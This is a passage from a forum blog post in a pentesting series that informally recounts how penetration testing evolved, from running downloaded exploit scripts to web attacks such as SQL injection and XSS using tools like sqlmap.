Clientside Exploitation in 2018 - How Pentesting Has Changed

Exploitation in 2018 - How Pentesting Has Changed

Hi 0x00sec! This is the next installment of my pentesting series. If you missed my last two articles, you can read the first one here and the second one here. They are heavily OSINT focussed, and naturally, the next article should be about active recon, however, I move in erratic ways and such the next installment is about exploitation, and specifically, how the field has changed up until now.

Please note, I am not an expert in pentesting history, this is purely my understanding of it and has been sourced from speaking with fellow infosec professionals and my experience.

The History

New, Old School Pentesting

Back in the old days (post 90’s, yes, I’m young), pentesting was as easy as doing a port scan, finding a host, and then running a script against it as soon as you were able to download the module from exploit-db or similar. People who did this in the early 2000’s were able to pass as pentesters, and be proficient at it, systems were rampant with insecurities, and so getting in (generally speaking), was a straightforward feat. You also had a lot of security consulting businesses charging as little as $500 for a “pentest”, which damaged the name of penetration testing, especially when they later got hit by more advanced threats.

The wave of SQLi and AppSec

Then, people starting getting a little smarter, and pentesters began utilizing things like SQL Injection, XSS and other web application related security, this was nicely supplemented by the release of sqlmap, allowing virtually anybody to exploit blind SQL Injection vulnerabilities. Around this period, SQL Injection actually was at the top of the OWASP Top 10, and after being exploited a wide array of times, it easily became one of the worlds most well-known application vulnerabilities. Containerisation was not really a thing, and infrastructure was still widely deployed by hand.